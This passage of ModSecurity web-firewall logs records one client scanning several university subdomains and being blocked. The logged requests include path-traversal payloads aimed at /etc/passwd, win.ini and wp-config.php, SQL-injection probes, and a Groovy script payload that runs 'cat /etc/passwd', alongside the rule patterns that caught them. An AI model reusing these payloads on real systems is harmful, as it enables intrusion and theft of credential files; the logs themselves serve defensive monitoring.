"OWASP_CRS/2.2.8"] [maturity "9"] [hostname "informatika.unla.ac.id"] [uri "/_search"] [unique_id "ZO14d8Co-f0AAAkBKpEAAAAb"]
[Tue Aug 29 11:47:51.457477 2023] [:error] [pid 2304] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14d8Co-f0AAAkAL9UAAAAU"]
[Tue Aug 29 11:47:51.459759 2023] [:error] [pid 2317] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:bookisbn. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:bookisbn: 978-0-7303-1484-4'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/ebook/book.php"] [unique_id "ZO14d8Co-f0AAAkNPo8AAAAI"]
[Tue Aug 29 11:47:51.461715 2023] [:error] [pid 2293] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:bookisbn. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:bookisbn: 978-0-7303-1484-4'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/ebook/book.php"] [unique_id "ZO14d8Co-f0AAAj11@UAAAAa"]
[Tue Aug 29 11:47:51.463369 2023] [:error] [pid 2131] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:bookisbn. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:bookisbn: 978-0-7303-1484-4'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/ebook/book.php"] [unique_id "ZO14d8Co-f0AAAhT4DYAAAAD"]
[Tue Aug 29 11:47:51.463732 2023] [:error] [pid 2269] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:bookisbn. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:bookisbn: 978-0-7303-1484-4'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/ebook/book.php"] [unique_id "ZO14d8Co-f0AAAjdQQcAAAAZ"]
[Tue Aug 29 11:47:52.431778 2023] [:error] [pid 2131] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS_NAMES:{"size":1, "script_fields": {"lupin":{"lang":"groovy","script": "java.lang.Math.class.forName(\\\\"java.lang.Runtime\\\\").getRuntime().exec(\\\\"cat /etc/passwd\\\\").getText()"}}}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS_NAMES:{\\x22size\\x22:1, \\x22script_fields\\x22: {\\x22lupin\\x22:{\\x22lang\\x22:\\x22groovy\\x22,\\x22script\\x22: \\x22java.lang.Math.class.forName(\\x5c\\x5c\\x22java.lang.Runtime\\x5c\\x5c\\x22).getRuntime().exec(\\x5c\\x5c\\x22cat /etc/passwd\\x5c\\x5c\\x22).getText()\\x22}}}: {size:1 script_fields: {lupin:{lang:groovy script: java.lang.math.class.forname(java.lang.runtime).getruntime().exec(cat/etc/passwd).gettext()}}}"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [hostname "pusatbahasa.unla.ac.id"] [uri "/_search"] [unique_id "ZO14eMCo-f0AAAhT4DcAAAAD"]
[Tue Aug 29 11:47:52.467343 2023] [:error] [pid 2290] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14eMCo-f0AAAjy51oAAAAG"]
[Tue Aug 29 11:47:52.467718 2023] [:error] [pid 2269] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14eMCo-f0AAAjdQQgAAAAZ"]
[Tue Aug 29 11:47:52.469412 2023] [:error] [pid 2267] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/index.php"] [unique_id "ZO14eMCo-f0AAAjbw3YAAAAW"]
[Tue Aug 29 11:47:52.524602 2023] [:error] [pid 2282] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:show_file_name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:show_file_name: ../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/ACSServer/DownloadFileServlet"] [unique_id "ZO14eMCo-f0AAAjqDFoAAAAH"]
[Tue Aug 29 11:47:52.564837 2023] [:error] [pid 2131] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14eMCo-f0AAAhT4DkAAAAD"]
[Tue Aug 29 11:47:52.583050 2023] [:error] [pid 2290] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14eMCo-f0AAAjy51wAAAAG"]
[Tue Aug 29 11:47:52.583498 2023] [:error] [pid 2304] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:show_file_name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:show_file_name: ../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/ACSServer/DownloadFileServlet"] [unique_id "ZO14eMCo-f0AAAkAL9gAAAAU"]
[Tue Aug 29 11:47:52.594998 2023] [:error] [pid 2285] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:show_file_name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:show_file_name: ../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/ACSServer/DownloadFileServlet"] [unique_id "ZO14eMCo-f0AAAjtc5UAAAAX"]
[Tue Aug 29 11:47:52.609286 2023] [:error] [pid 2269] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:show_file_name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:show_file_name: ../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/ACSServer/DownloadFileServlet"] [unique_id "ZO14eMCo-f0AAAjdQQoAAAAZ"]
[Tue Aug 29 11:47:52.632360 2023] [:error] [pid 2333] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:pubid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:pubid: 4'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/ebook/bookPerPub.php"] [unique_id "ZO14eMCo-f0AAAkdu4YAAAAO"]
[Tue Aug 29 11:47:53.367123 2023] [:error] [pid 2317] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:bookisbn. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:bookisbn: 978-1-1180-2669-4'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/ebook/cart.php"] [unique_id "ZO14ecCo-f0AAAkNPpMAAAAI"]
[Tue Aug 29 11:47:53.389347 2023] [:error] [pid 2285] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:show_file_name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:show_file_name: ../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/ACSServer/DownloadFileServlet"] [unique_id "ZO14ecCo-f0AAAjtc5cAAAAX"]
[Tue Aug 29 11:47:53.389426 2023] [:error] [pid 2252] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:show_file_name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:show_file_name: ../../../../../../windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/ACSServer/DownloadFileServlet"] [unique_id "ZO14ecCo-f0AAAjM7HkAAAAT"]
[Tue Aug 29 11:47:53.392885 2023] [:error] [pid 2317] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14ecCo-f0AAAkNPpQAAAAI"]
[Tue Aug 29 11:47:53.416393 2023] [:error] [pid 2293] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS_NAMES:{"size":1, "script_fields": {"lupin":{"lang":"groovy","script": "java.lang.Math.class.forName(\\\\"java.lang.Runtime\\\\").getRuntime().exec(\\\\"cat /etc/passwd\\\\").getText()"}}}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS_NAMES:{\\x22size\\x22:1, \\x22script_fields\\x22: {\\x22lupin\\x22:{\\x22lang\\x22:\\x22groovy\\x22,\\x22script\\x22: \\x22java.lang.Math.class.forName(\\x5c\\x5c\\x22java.lang.Runtime\\x5c\\x5c\\x22).getRuntime().exec(\\x5c\\x5c\\x22cat /etc/passwd\\x5c\\x5c\\x22).getText()\\x22}}}: {size:1 script_fields: {lupin:{lang:groovy script: java.lang.math.class.forname(java.lang.runtime).getruntime().exec(cat/etc/passwd).gettext()}}}"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [hostname "www.unla.ac.id"] [uri "/_search"] [unique_id "ZO14ecCo-f0AAAj11@wAAAAa"]
[Tue Aug 29 11:47:53.434874 2023] [:error] [pid 2317] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:show_file_name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:show_file_name: ../../../../../../windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/ACSServer/DownloadFileServlet"] [unique_id "ZO14ecCo-f0AAAkNPpYAAAAI"]
[Tue Aug 29 11:47:53.435086 2023] [:error] [pid 2131] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:show_file_name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:show_file_name: ../../../../../../windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/ACSServer/DownloadFileServlet"] [unique_id "ZO14ecCo-f0AAAhT4D0AAAAD"]
[Tue Aug 29 11:47:53.441858 2023] [:error] [pid 2310] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:show_file_name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:show_file_name: ../../../../../../windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/ACSServer/DownloadFileServlet"] [unique_id "ZO14ecCo-f0AAAkGCUYAAAAE"]
[Tue Aug 29 11:47:54.377331 2023] [:error] [pid 2330] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:show_file_name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:show_file_name: ../../../../../../windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/ACSServer/DownloadFileServlet"] [unique_id "ZO14esCo-f0AAAkaC-IAAAAJ"]
[Tue Aug 29 11:47:54.405493 2023] [:error] [pid 2149] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:show_file_name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:show_file_name: ../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/ACSServer/DownloadFileServlet"] [unique_id "ZO14esCo-f0AAAhl0MsAAAAi"]
[Tue Aug 29 11:47:54.436990 2023] [:error] [pid 2285] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:bookisbn. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:bookisbn: 978-0-7303-1484-4'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/ebook/book.php"] [unique_id "ZO14esCo-f0AAAjtc5sAAAAX"]
[Tue Aug 29 11:47:55.369645 2023] [:error] [pid 2293] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:show_file_name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:show_file_name: ../../../../../../windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/ACSServer/DownloadFileServlet"] [unique_id "ZO14e8Co-f0AAAj11-AAAAAa"]
[Tue Aug 29 11:47:56.394763 2023] [:error] [pid 2310] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:guideState. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22:{\\x22 found within ARGS:guideState: {\\x22guideState\\x22:{\\x22guideDom\\x22:{},\\x22guideContext\\x22:{\\x22xsdRef\\x22:\\x22\\x22,\\x22guidePrefillXml\\x22:\\x22<afData>\\x5cu0041\\x5cu0042\\x5cu0043</afData>\\x22}}}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/content/2UdyWQdY5J32lAmsUBxLSfyO3WC.af.internalsubmit.json"] [unique_id "ZO14fMCo-f0AAAkGCU8AAAAE"]
[Tue Aug 29 11:47:56.400275 2023] [:error] [pid 2252] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:guideState. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22:{\\x22 found within ARGS:guideState: {\\x22guideState\\x22:{\\x22guideDom\\x22:{},\\x22guideContext\\x22:{\\x22xsdRef\\x22:\\x22\\x22,\\x22guidePrefillXml\\x22:\\x22<afData>\\x5cu0041\\x5cu0042\\x5cu0043</afData>\\x22}}}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/content/2UdyWQdY5J32lAmsUBxLSfyO3WC.af.internalsubmit.json"] [unique_id "ZO14fMCo-f0AAAjM7IIAAAAT"]
[Tue Aug 29 11:47:56.415502 2023] [:error] [pid 2317] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:guideState. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22:{\\x22 found within ARGS:guideState: {\\x22guideState\\x22:{\\x22guideDom\\x22:{},\\x22guideContext\\x22:{\\x22xsdRef\\x22:\\x22\\x22,\\x22guidePrefillXml\\x22:\\x22<afData>\\x5cu0041\\x5cu0042\\x5cu0043</afData>\\x22}}}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/content/2UdyWQdY5J32lAmsUBxLSfyO3WC.af.internalsubmit.json"] [unique_id "ZO14fMCo-f0AAAkNPqAAAAAI"]
[Tue Aug 29 11:47:56.439521 2023] [:error] [pid 2317] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:guideState. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22:{\\x22 found within ARGS:guideState: {\\x22guideState\\x22:{\\x22guideDom\\x22:{},\\x22guideContext\\x22:{\\x22xsdRef\\x22:\\x22\\x22,\\x22guidePrefillXml\\x22:\\x22<afData>\\x5cu0041\\x5cu0042\\x5cu0043</afData>\\x22}}}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/content/2UdyWQdY5J32lAmsUBxLSfyO3WC.af.internalsubmit.json"] [unique_id "ZO14fMCo-f0AAAkNPqEAAAAI"]
[Tue Aug 29 11:47:56.505746 2023] [:error] [pid 2252] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:guideState. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22:{\\x22 found within ARGS:guideState: {\\x22guideState\\x22:{\\x22guideDom\\x22:{},\\x22guideContext\\x22:{\\x22xsdRef\\x22:\\x22\\x22,\\x22guidePrefillXml\\x22:\\x22<afData>\\x5cu0041\\x5cu0042\\x5cu0043</afData>\\x22}}}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/content/2UdyWQdY5J32lAmsUBxLSfyO3WC.af.internalsubmit.json"] [unique_id "ZO14fMCo-f0AAAjM7IYAAAAT"]
[Tue Aug 29 11:47:57.364278 2023] [:error] [pid 2149] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:adaptive-images-settings[source_file]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:adaptive-images-settings[source_file]: ../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/wp-content/plugins/adaptive-images/adaptive-images-script.php"] [unique_id "ZO14fcCo-f0AAAhl0NIAAAAi"]
